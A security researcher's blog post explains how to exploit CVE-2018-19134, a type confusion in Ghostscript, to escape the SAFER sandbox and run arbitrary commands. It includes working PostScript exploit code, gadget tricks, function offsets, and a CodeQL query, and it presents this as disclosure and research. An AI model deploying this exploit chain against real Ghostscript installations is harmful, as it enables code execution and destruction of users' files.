February 5, 2019

Exploiting CVE-2018-19134: Ghostscript RCE through type confusion

Man Yue Mo

In this post I'll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you'd like to know more about how I used our CodeQL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post.

The vulnerability

Let's first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s).

struct ref_s {

    struct tas_s tas;

    union v {
        ps_int intval;
        ...
        uint64_t dummy;
    } value;
};

This is a 16 byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for array, string, dictionary, etc.:

struct tas_s {
    ushort type_attrs;
    ushort _pad;
    uint32_t rsize;
};

The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t.

static int
zsetcolor(i_ctx_t * i_ctx_p)
{
    ...
    if ((n_comps = cs_num_components(pcs)) < 0) {
        n_comps = -n_comps;
        if (r_has_type(op, t_dictionary)) {
            ref     *pImpl, pPatInst;

            if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0)
                return code;
            if (code > 0) {
                code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy
                if (code < 0)
                    return code;
                cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?!
                n_numeric_comps = ( pattern_instance_uses_base_space(cc.pattern) ? n_comps - 1 : 0);

Here, r_ptr is a macro in iref.h:

#define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct))

The value of pstruct originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41.

<< /Implementation [16#41] >> setpattern

Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer:

pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst)
{
  return pinst->type->procs.uses_base_space(
           pinst->type->procs.get_pattern(pinst) );
}

So it looks like I may be able to control a number of function pointers: get_pattern, uses_base_space, and pinst.

Creating a fake object

Let's see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control:

postscript_array

In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs and pad in tas completely); green indicates the data that I have complete control of. The crucial point here is that, both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays:

GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern

This sets pinst to the array [16#41 [16#51 16#52]] and results in:

pinst

This shows I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution?

8 bytes off an easy exploit

I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator. As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by getting the operators off the systemdict by their name:

GS>systemdict /put get ==
GS>--put--

So let's try to put some built-in functions in our fake array:

/arr 100 array def
systemdict /put get arr exch 1 exch put
systemdict /get get arr exch 0 exch put
<</Implementation [[16#41 arr]] >> setpattern

I'll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may exist a better way of achieving that, but keep in mind that I've never written a line of PostScript before I found these vulnerabilities, so please bear with me.

Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern:

zgetput

So I can now call functions that I could already call from PostScript anyway, so what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (alias of gs_context_state_s — they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions:

struct gs_context_state_s {
    ...
    bool LockFilePermissions;	/* accessed from userparams */
    ...
    /* Put the stacks at the end to minimize other offsets. */
    dict_stack_t dict_stack;
    exec_stack_t exec_stack;
    op_stack_t op_stack;
    struct i_plugin_holder_s *plugin_list;
};

When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we'll be able to call functions as if Ghostscript is running without -dSAFER mode switched on.

So let's try to create a PostScript array to fake the context i_ctx_t object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the argument. In order to call PostScript functions with a fake context, I'll need to control p. The offset from p to the i_ctx_p here is actually the same as the offset of op_stack, which is 0x270. As each ref is of size 0x10, this corresponds to the 39th element in the fake reference array:

op_stack

As seen from the diagram, this alignment is not ideal. The op_stack.stack.p corresponds to the tas part of my array, which I don't control completely. If only op_stack corresponded to a value field of a ref, then I would have succeeded. What's more, tas stores meta data of a ref, so even if I have full control of it, I won't be able to set it to the address of an arbitrary object without first knowing its address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper.

Getting arbitrary read and write primitives

The idea now is to find a PostScript function that: 1. Does not dereference the osp (op_stack.stack.p) pointer; 2. Still does something "useful" to osp; 3. Is available in SAFER mode.

Stack operators come to mind. The pop operator is particularly interesting:

zpop(i_ctx_t *i_ctx_p)
{
    os_ptr op = osp;

    check_op(1);
    pop(1);
    return 0;
}

It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If it is greater than osbot, then decreases the value of osp. It is a simple function that does not dereference osp, and it changes its value. To see what I can gain from this, let's take a closer look at the structure of ref and op_stack side by side:

op_stack_ref

Recall that in our fake object, op_stack is faked by the 39th element of a ref array, which is a ref. As you can see in the image above, the field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _padd and rsize combined to form the the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice! One catch though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, will combine with others to give something that is greater than the pointer address of most ref objects. This prevents me from just modifying the accessibility of built-in read only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do:

  1. I can "convert" an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte of the same length). This allows me to read/write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of length specified by rsize, so any byte can be read/write from the byte buffer. Note that this does not give me any out-of-bound (OOB) read/write as the resulted string will have the same length as the original array, but since each ref is of 16 bytes, the resulting byte buffer will only cover about 1/16 of the original allocated buffer for the ref array. This is what I'm going to do with the exploit.

  2. I can of course do it the other way round and "convert" a string into an array of the same length. As explained above, the resulting ref array will be about 16 times larger than the original string array, which allows me to do OOB read and write. I have not pursued this route.

There is one more technical difficulty that I need to overcome. The fake object, pinst actually calls two functions, with the output of one feeding into another:

  return pinst->type->procs.uses_base_space(
           pinst->type->procs.get_pattern(pinst) );

As seen from above, use_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst) as an input. As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn't even use the context pointer i_ctx_p at all.

If only there exists a query language I could use to find particular patterns in a codebase! Here's the query I used to find the operator I was looking for:

from Function f
where
  f.getName().matches("z%") and
  f.getFile().getAbsolutePath().matches("%/psi/%") and
  // Look for functions with a single parameter of the right type:
  f.getNumberOfParameters() = 1 and f.getParameter(0).getType().hasName("i_ctx_t *") and
  // Make sure the function is actually defined:
  exists(Stmt stmt | stmt.getEnclosingFunction() = f) and
  // And doesn't access `i_ctx_p`
  not exists(FieldAccess fa, Function f2 |
    fa.getQualifier().getType().hasName("i_ctx_t *") and
    fa.getEnclosingFunction() = f2 and f.calls*(f2)
   )
  // And doesn't dereference `i_ctx_p`
  and not exists(PointerDereferenceExpr expr, Variable v, Function f2 | 
    expr.getAnOperand() = v.getAnAccess() and
    v.getType().hasName("i_ctx_t *") and 
    expr.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
select f

My query uses some heuristics to identify PostScript operators. Their names normally start with z and are defined inside the psi directory. Also they they take an argument of type i_ctx_t *. I then look for functions that do not dereference the argument nor access its fields, either in itself or in functions that it calls. This query does not look for dereferences of the parameter i_ctx_p particularly, but just any variable of type i_ctx_t *, which is a good enough approximation.

You can run your own queries on over 130,000 GitHub,Bitbucket, and GitLab projects at LGTM.com. You can use either the online query console, or you can install the CodeQL for Eclipse plugin and run queries locally on a code snapshot (downloadable from the repo's project page on LGTM).

[EDIT]: You can also use our free CodeQL extension for Visual Studio Code. See installation instructions at https://securitylab.github.com/tools/codeql.

Ghostscript is not developed on GitHub, Bitbucket, or GitLab, so it has not been analyzed by LGTM.com. But you can download a Ghostscript code snapshot here.

This query gives me 6 results:

ucache

The function ucache seems to be just what we need. Let's try to put this together and see if it works. First set up the fake object pinst:

%Create the fake array pinst
/pinst 100 array def
%array that stores the pop-ucache gadget
/pop_ucache 100 array def
%put pop into pop_ucache to cause more type confusions by decrementing osp
systemdict /pop get pop_ucache exch 1 exch put
%put ucache in (no op) to avoid crash
systemdict /ucache get pop_ucache exch 0 exch put
%replace the functions with pop and ucache
pinst 1 pop_ucache put

Now we need to create a large array object and store it in the 39th element of pinst. It's metadata tas will then be interpreted as the stack pointer address osp. I'll use the PostScript operator put as its first element, then use pop to change its type to string and read off the address of the zput function.

%make a large enough array and change its type with pop
/arr 32767 array def
%get the address of the put operator
systemdict /put get arr exch 0 exch put
%store arr as 39th element of pinst and modify its type
pinst 39 arr put
%Create the argument to setpattern
/impl 100 dict def
impl /Implementation [pinst] put
%Change type of arr to string
0 1 1291 {impl setpattern} for
% Print the address of zput as string
pinst 39 get 8 8 getinterval

It is a bit unfortunate that the type_attrs value for array is 0x4 while the value for string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to do impl setpattern 1291 times.

put_addr

As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run it outside of gdb or at least enable address randomization to get it work, as gdb seem to always allocate arr at 0x7ffff0a35078, but with memory randomization, I've not failed a single time with the above. I can also use this to write bytes to any position in arr.

Sandbox bypass

Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions parameter, and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I'm just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely.

Summarizing, here is what I need to do now: 1. Create a fake operand stack with arguments that I want to supply to forceput; 2. Overwrite the location in pinst that stores the address of the operand stack pointer to the address of what I created above; 3. Get the address of forceput and replace pinst->type.procs.getpattern with its address.

To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments:

/operand 3 array def
operand 0 userparams put
operand 1 /LockFilePermissions put
operand 2 false put

I can then store it in arr to retrieve the address to this array. Instead of using arr, I'm just going to reuse pinst and put it in the 31st element instead:

pinst 31 operand 2 1 getinterval put

Note that instead of putting operand into the 31st element of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions looks for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it will get my other arguments.

Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This then sets up pinst for calling forceput. Although forceput is not accessible from SAFER mode, I can simply take the address of zput, and add its offset to zforceput to obtain the address of zforceput (as this offset is not randomized). In the debug binary compiled with commit 81f3d1e, this offset is 0x437 and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call a restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here's a screenshot of the launching of a calculator from sandboxed Ghostscript:

run_command

By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don't stop a specially-crafted PDF file from wiping a user's entire home directory when opened. Or, if you're in a more forgiving mood, you could delete all files from a user's desktop and subsequently flood it with Super Mario bricks:


https://youtube.com/watch?v=5vVxN-vfCsI

For more videos about our security research and exploits, please visit the Semmle YouTube channel.

If you'd like to run your own queries on open source software: you can! We've made our CodeQL technology freely available for running queries on open source projects that have been analyzed by LGTM.com. At the time of writing, LGTM.com has analyzed around 130,000 GitHub, Bitbucket, and GitLab repositories. For each of these projects, you can download a code snapshot from LGTM.com for running queries. In addition, you'll need the CodeQL for Eclipse plugin. Unfortunately Ghostscript is not developed on GitHub.com and has therefore not been analyzed by LGTM.com. We've therefore made the Ghostscript code snapshot available here.

Note: Post originally published on LGTM.com on February 05, 2019